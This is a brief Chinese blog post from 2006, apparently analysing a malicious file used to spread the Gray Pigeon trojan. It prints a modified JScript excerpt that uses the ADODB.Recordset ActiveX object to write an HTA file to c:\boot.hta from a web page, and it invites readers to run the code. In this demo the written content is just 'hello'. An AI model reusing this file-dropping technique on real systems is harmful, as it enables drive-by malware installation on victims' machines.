purpleendurer原创
2006-04-08第1版
对发现一个使用技术升级、下载灰鸽子的网站中的恶意文件young.gif进行了分析和注释,收获颇多。其一便是利用ADODB写文件。
下面的代码是从young.gif中截取、修改的,用来写入文件c:\boot.hta。
<html>
<HEAD></HEAD>
</HTML>
<SCRIPT language=JScript>
try
{
var strHello = "hello";
//利用ADODB写文件
Rfuc1k1S=new ActiveXObject("ADODB.Recordset");
Rfuc1k1S.Fields.Append("love", 200, 3000);
mike=1;
Rfuc1k1S.Open();
mike=1;
Rfuc1k1S.AddNew();
mike=1;
Rfuc1k1S.Fields("love").Value = strHello;
}
catch(e)
{}
Rfuc1k1S.Update();
try
{
Rfuc1k1S.Save("c:\\boot.hta" ,0); //保存为c:\boot.hta
}
catch(e)
{}
</SCRIPT>
</BODY>
</HTML>
把它复制/粘贴到记事本里,保存为HTM文件,双击运行。
看看c:\boot.hta是否出来了?